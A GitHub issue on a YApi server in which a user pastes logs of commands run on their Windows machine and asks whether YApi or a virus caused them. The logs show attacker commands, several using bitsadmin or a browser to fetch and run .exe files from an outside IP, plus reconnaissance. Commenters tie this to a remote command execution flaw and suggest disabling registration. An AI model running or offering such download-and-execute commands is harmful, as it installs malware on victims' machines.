Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

windows会出现错误,由于copy命令失败引起,然后log日志打印显示是会自动去打开谷歌浏览器访问ip下载.exe,想问下这个是yapi自己又的逻辑,还是中病毒了 #2152

Open
yxAnswer opened this issue Mar 29, 2021 · 6 comments
Open

windows会出现错误,由于copy命令失败引起,然后log日志打印显示是会自动去打开谷歌浏览器访问ip下载.exe,想问下这个是yapi自己又的逻辑,还是中病毒了 #2152

yxAnswer opened this issue Mar 29, 2021 · 6 comments

Comments

@yxAnswer
Copy link

[ 2021-3-26 11:24:22 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 11:24:23 ] [ log ] 服务已启动,请打开下面链接访问:
http://127.0.0.1:9010/
[ 2021-3-26 11:25:31 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 11:25:32 ] [ log ] 服务已启动,请打开下面链接访问:
http://127.0.0.1:9010/
[ 2021-3-26 11:27:55 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 11:27:55 ] [ log ] 服务已启动,请打开下面链接访问:
http://127.0.0.1:9010/
[ 2021-3-26 11:27:55 ] [ log ] mongodb load success...
[ 2021-3-26 11:53:55 ] [ error ] Command failed: ls
'ls' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���

[ 2021-3-26 12:10:04 ] [ error ] Command failed: cmd.exe /c bitsadmin /transfer 1d4c http://45.32.26.47:801/ab %APPDATA%�d4c.exe&%APPDATA%�d4c.exe&del %APPDATA%�d4c.exe
�ļ�����Ŀ¼�������������ȷ��
�ļ�����Ŀ¼�������������ȷ��

[ 2021-3-26 12:13:00 ] [ error ] Command failed: echo 'cmd.exe /c bitsadmin /transfer 1d4c http://45.32.26.47:801/ab %APPDATA%�d4c.exe&%APPDATA%�d4c.exe&del %APPDATA%�d4c.exe' >> 1.bat && dir
�ļ�����Ŀ¼�������������ȷ��
�ļ�����Ŀ¼�������������ȷ��

[ 2021-3-26 12:34:06 ] [ error ] Command failed: cmd.exe /c bitsadmin /transfer 1d4c http://45.32.26.47:801/ab %APPDATA%�d4c.exe&%APPDATA%�d4c.exe&del %APPDATA%�d4c.exe
�ļ�����Ŀ¼�������������ȷ��
�ļ�����Ŀ¼�������������ȷ��

[ 2021-3-26 12:34:28 ] [ error ] Command failed: cmd.exe /c bitsadmin /transfer 1d4c http://45.32.26.47:801/ab
[ 2021-3-26 12:35:01 ] [ error ] Command failed: cmd.exe /c bitsadmin /transfer 1d4c http://45.32.26.47:801/ab %APPDATA%�d4c.exe&%APPDATA%�d4c.exe
�ļ�����Ŀ¼�������������ȷ��

[ 2021-3-26 13:29:59 ] [ error ] Command failed: cd D:// && dir
�豸δ������

[ 2021-3-26 13:38:25 ] [ error ] {}
[ 2021-3-26 13:39:04 ] [ error ] {}
[ 2021-3-26 13:39:38 ] [ error ] Command failed: echo systeminfo >> 1.txt && cat 1.txt
'cat' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���

[ 2021-3-26 13:40:24 ] [ error ] {}
[ 2021-3-26 13:43:24 ] [ error ] Command failed: explorer http://45.32.26.47:8044/aaa.exe
[ 2021-3-26 13:46:11 ] [ error ] Command failed: cd C:UsersAdministratorDownloads && dir
ϵͳ�Ҳ���ָ����·����

[ 2021-3-26 13:49:04 ] [ error ] Command failed: cd C://Users/Administrator/Downloads &&ren 522134.crdownload 1.exe &&dir
ϵͳ�Ҳ���ָ�����ļ���

[ 2021-3-26 13:49:25 ] [ error ] Command failed: cd C://Users/Administrator/Downloads && ren 522134.crdownload 1.exe && dir
ϵͳ�Ҳ���ָ�����ļ���

[ 2021-3-26 13:51:22 ] [ error ] Command failed: cd C://Users/Administrator/Downloads && copy 522134.crdownload 1.exe && dir
[ 2021-3-26 13:51:35 ] [ error ] Command failed: copy 522134.crdownload 1.exe && dir
[ 2021-3-26 13:52:06 ] [ error ] Command failed: cd C://Users/Administrator/Downloads && copy 522134.crdownload 1.exe && dir
[ 2021-3-26 13:53:45 ] [ error ] Command failed: copy C://Users/Administrator/Downloads/522134.crdownload C://Users/Administrator/Downloads/1.exe && dir
[ 2021-3-26 13:58:11 ] [ error ] Command failed: copy C://Users/Administrator/Downloads/522134.crdownload C://Users/Administrator/Downloads/1.exe && dir
[ 2021-3-26 14:36:42 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 14:36:43 ] [ log ] 服务已启动,请打开下面链接访问:
http://127.0.0.1:9010/
[ 2021-3-26 14:36:44 ] [ log ] mongodb load success...
[ 2021-3-26 17:22:25 ] [ error ] Command failed: 1.exe
'1.exe' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���

[ 2021-3-26 17:22:54 ] [ error ] Command failed: 1.exe
'1.exe' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���

[ 2021-3-26 18:17:38 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 18:17:39 ] [ log ] 服务已启动,请打开下面链接访问:
http://127.0.0.1:9010/
[ 2021-3-26 18:17:40 ] [ log ] mongodb load success...
[ 2021-3-26 18:29:36 ] [ error ] missing ) after argument list
[ 2021-3-26 18:30:20 ] [ error ] Command failed: start http://45.32.26.47:4878/test/a.exe && cd C:/Users/Administrator/Downloads && copy "未确认 905354.crdownload" 2.exe && dir
[ 2021-3-26 18:30:51 ] [ error ] Command failed: cd C:/Users/Administrator/Downloads && copy "未确认 905354.crdownload" 2.exe && dir
[ 2021-3-26 18:32:27 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 18:32:28 ] [ log ] 服务已启动,请打开下面链接访问:
http://127.0.0.1:9010/
[ 2021-3-26 18:32:29 ] [ log ] mongodb load success...
[ 2021-3-26 18:33:12 ] [ error ] Command failed: cd C:/Users/Administrator/Downloads && copy a (2).exe 3.exe && dir
[ 2021-3-26 18:33:31 ] [ error ] Command failed: cd C:/Users/Administrator/Downloads && copy "a (2).exe" 3.exe && dir
[ 2021-3-26 18:35:02 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-26 18:35:03 ] [ log ] 服务已启动,请打开下面链接访问:
http://127.0.0.1:9010/
[ 2021-3-26 18:35:03 ] [ log ] mongodb load success...
[ 2021-3-26 23:45:03 ] [ error ] Command failed: cd C:/Users/Administrator/Downloads && rm 97666def-2363-48ec-963c-7c950465770a.tmp&& dir
'rm' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���

[ 2021-3-26 23:45:04 ] [ error ] Command failed: cd C:/Users/Administrator/Downloads && rm 97666def-2363-48ec-963c-7c950465770a.tmp&& dir
'rm' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���

[ 2021-3-26 23:46:21 ] [ error ] Command failed: cd C:/Users/Administrator/Downloads && copy '未确认 172117.crdownload' 1.txt && dir
[ 2021-3-29 08:58:47 ] [ log ] -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
[ 2021-3-29 08:58:50 ] [ log ] 服务已启动,请打开下面链接访问:
http://127.0.0.1:9010/
[ 2021-3-29 08:58:50 ] [ log ] mongodb load success...
@yxAnswer yxAnswer changed the title windows会出现错误,由于copy命令失败引起,然后log日志打印显示是会自动去访问ip下载.exe,想问下这个是yapi自己又的逻辑,还是中病毒了 windows会出现错误,由于copy命令失败引起,然后log日志打印显示是会自动去打开谷歌浏览器访问ip下载.exe,想问下这个是yapi自己又的逻辑,还是中病毒了 Mar 29, 2021
@acccccccb
Copy link

45.32.26.47:4878/test/a.exe 看这个下载地址就感觉不是什么正经代码

@yxAnswer
Copy link
Author

最近正常了,就那两天不知道怎么回事

@yxAnswer
Copy link
Author

image

这个45.32.26.47 绑定过的域名如下:
2021-04-15-----2021-04-15 www.winapi.top

@qiyulan
Copy link
Contributor

qiyulan commented Apr 16, 2021

如果开了允许注册,那肯定会被攻击
see #2099 远程命令执行漏洞

@acccccccb
Copy link

首先检查服务器有没有被入侵,这个我不太熟就不说了。主要说yapi的修改
1.关闭注册,在config.json中加入:"closeRegister": true
2.检查并清理yapi中的用户
3.关于代码方面的改动,我写在这个issue下了, #2099 ,欢迎讨论

@yxAnswer
Copy link
Author

关闭注册以后,想问下如何添加人员呢。 我看之前有这样的issue,但是没看到如何开启那个添加人员。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@yxAnswer @qiyulan @acccccccb